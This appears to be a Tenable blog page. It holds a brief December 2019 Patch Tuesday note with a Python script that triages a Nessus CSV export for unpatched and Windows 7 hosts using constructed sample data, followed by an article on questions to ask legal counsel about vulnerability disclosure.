A list of all of the plugins released for Tenable’s December 2019 Patch Tuesday update can be found here. As always, we recommend patching systems as soon as possible and regularly scanning your environment to identify those systems yet to be patched.

As a reminder, Windows 7 support will be discontinued on January 14, 2020, so we strongly recommend reviewing what hosts remain and any action plans for migration. Plugin ID 11936 (OS Identification) can be useful for identifying hosts still running on Windows 7.
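The same two checks described above (findings from the December 2019 plugins, and Windows 7 hosts reported by plugin 11936) can be run offline against an exported scan, which is useful when tracking which hosts remain unpatched between scans. The following is an added example and not Tenable’s own code: it assumes the column layout of a Nessus CSV export (Plugin ID, Risk, Host, Name, Plugin Output), and the rows, hosts, plugin IDs 900001–900003 and plugin names are constructed sample data rather than real plugins or scan results. The only real identifier is plugin 11936 from the post.

```python
"""Triage a Nessus-style CSV export: list December 2019 Patch Tuesday findings
per host and flag hosts that plugin 11936 (OS Identification) reports as
Windows 7, which leaves support on January 14, 2020.

Added example, not Tenable's code. Column names follow the Nessus CSV export
layout (an assumption); the rows, hosts, plugin IDs 900001-900003 and plugin
names below are constructed sample data, not real plugins or scan results.
"""
import csv
import io
import re
from collections import defaultdict

OS_IDENT_PLUGIN = "11936"       # Nessus "OS Identification", cited in the post
PATCH_MONTH = "december 2019"   # the "Plugin Name Contains December 2019" filter
WINDOWS7 = re.compile(r"\bwindows 7\b", re.IGNORECASE)

# Constructed sample export: four hosts, three of them Windows 7 per plugin 11936.
# Host 10.0.0.8 is Windows 7 but has no December 2019 finding in this export.
SAMPLE_CSV = """\
Plugin ID,CVE,CVSS,Risk,Host,Protocol,Port,Name,Plugin Output
11936,,,None,10.0.0.5,tcp,0,OS Identification,Remote operating system : Microsoft Windows 7 Professional
11936,,,None,10.0.0.6,tcp,0,OS Identification,Remote operating system : Microsoft Windows 10 Enterprise
11936,,,None,10.0.0.7,tcp,0,OS Identification,Remote operating system : Microsoft Windows 7 Enterprise
11936,,,None,10.0.0.8,tcp,0,OS Identification,Remote operating system : Microsoft Windows 7 Ultimate
900001,CVE-2019-1458,7.8,High,10.0.0.5,tcp,445,Placeholder Windows 7 December 2019 Security Update,
900001,CVE-2019-1458,7.8,High,10.0.0.7,tcp,445,Placeholder Windows 7 December 2019 Security Update,
900002,CVE-2019-1471,7.8,High,10.0.0.6,tcp,445,Placeholder Windows 10 December 2019 Security Update,
900003,,,Info,10.0.0.6,tcp,443,Placeholder TLS Certificate Information,
"""


def parse_export(text):
    """Return the export rows as dicts keyed by the CSV header names."""
    return list(csv.DictReader(io.StringIO(text)))


def patch_findings(rows, month=PATCH_MONTH):
    """Map host -> sorted plugin IDs whose plugin name contains `month`.

    Matching is case-insensitive, mirroring the 'Plugin Name Contains' filter
    used to build the scan in the Tenable UI.
    """
    findings = defaultdict(set)
    for row in rows:
        if month in row["Name"].lower():
            findings[row["Host"]].add(row["Plugin ID"])
    return {host: sorted(ids) for host, ids in findings.items()}


def windows7_hosts(rows):
    """Hosts whose plugin 11936 output names Windows 7 (word-bounded, so
    'Windows 10' or 'Windows 7x' style strings do not match)."""
    hosts = {row["Host"] for row in rows
             if row["Plugin ID"] == OS_IDENT_PLUGIN
             and WINDOWS7.search(row["Plugin Output"])}
    return sorted(hosts)


def end_of_life_exposure(rows):
    """Windows 7 hosts that still carry an open December 2019 finding:
    these need the patch now and a migration plan before support ends."""
    open_findings = patch_findings(rows)
    return [host for host in windows7_hosts(rows) if host in open_findings]


if __name__ == "__main__":
    rows = parse_export(SAMPLE_CSV)
    for host, plugins in sorted(patch_findings(rows).items()):
        print(f"{host}: missing December 2019 plugins {', '.join(plugins)}")
    print("Windows 7 hosts:", ", ".join(windows7_hosts(rows)))
    print("Windows 7 hosts still unpatched:", ", ".join(end_of_life_exposure(rows)))
```

The word-bounded regular expression matters more than it looks: a plain substring test for “Windows 7” is safe against “Windows 10”, but matching on the OS Identification output rather than on host names keeps the check tied to what the scanner actually fingerprinted. Swap `SAMPLE_CSV` for the contents of a real export to run it against your own results.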

Get more information

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface.

Get a free 30-day trial of Tenable.io Vulnerability Management.

5 Questions to Ask Legal About Vulnerability Disclosure


In part two of our series exploring the relationship between law and security, we’ll look at the key questions cybersecurity should ask legal when a company learns about a vulnerability in a product they produce or use. 

Vulnerabilities reside within somewhat of a legal and ethical gray zone when it comes to disclosure and response. There are responsible disclosure practices, but no laws that regulate disclosure. However, vulnerabilities have triggered several instances of litigation. 

That’s right: Even without a security breach, a vulnerability alone is enough to bring legal action. Having a legal team be a central part of your vulnerability management plan could save your organization a much bigger headache down the line. 

Five questions cybersecurity should ask legal about vulnerability disclosure

#1. What are the legal risks we’ll have in the event of a reported vulnerability? 

Recent litigation trends show lawsuits emerging over vulnerabilities, even in situations where breaches have not occurred. Knowledge of a vulnerability without timely public disclosure and patching can lead to lawsuits over negligence, breach of implied warranty, deceptive practices and more. Take, for example, the 32 lawsuits that emerged over Intel’s handling of the microchip vulnerabilities Meltdown and Spectre.

Asking your legal team about the legal risks of vulnerability disclosure can inform your vulnerability management program and prevent unwanted litigation. 

#2. What are some practical steps we can take to avoid legal action? 

No one wants to get sued. Regardless of the legal outcome, lawsuits can result in reputational harm to your organization. Moreover, your organization will incur costs and expend time and resources on the lawsuit. There are several steps your organization can take to avoid legal action: 

  • Have a vulnerability disclosure program (VDP) 
  • Practice responsible or coordinated disclosure 
  • Patch vulnerabilities in a timely fashion

#3. How can we use the law to understand our cyber risk?

Too often, security and tech fields fail to recognize that the law is a crucial tool for understanding cybersecurity. In some instances, the law can actually help security and tech teams understand their cyber risk. Both GDPR and the California Consumer Privacy Act (CCPA) require organizations to provide “reasonable” security when it comes to protecting consumer data. 

Interpreting what reasonable security means for your organization can help to understand your specific organization’s cyber risk. For example, examining where protections are already in place can reveal other areas that lack similar protection. The definition of reasonable security has changed from when it was first used, and the phrase will likely continue to evolve with industry changes. So, it is important to continuously compare your security measures to those of your peers. In doing so, you are using the law to help understand your cyber risk, and develop and maintain your security measures. 

#4. How can legal help us improve our vulnerability management response plan?

When vulnerabilities are disclosed, particularly those that receive media attention, panic can ensue. Mitigate this by having a vulnerability management program that prepares you for when vulnerabilities are disclosed. A vulnerability management program should include:

  • A VDP
  • A response plan
  • An outline for expected communications between researchers, companies and media

Having legal, security and IT work as a cohesive unit can hugely benefit your response plan. Asking the legal team for their input could bolster your vulnerability management program because it creates the opportunity for additional insight. A lawyer may not have the same technical skills as, say, the IT department, but their unique background can bring a fresh perspective to vulnerability management. They may be able to discern whether or not legal issues could arise out of your vulnerability management plan. 

#5. Does our VDP follow legal best practices?

If your organization has a VDP (which it should), you can establish legal best practices. Aside from providing security researchers with a clear process and scope for reporting vulnerabilities, a VDP should also grant researchers safe harbor. A sound VDP lets researchers know that you won’t sue them for finding and reporting a vulnerability in your system. Your legal team can assist in developing a VDP that follows industry best practices and provides a legal safety net for researchers. 

The questions above are just a starting-off point, helping establish both stronger communication between legal and security teams and a better vulnerability management plan. 

Get more information 
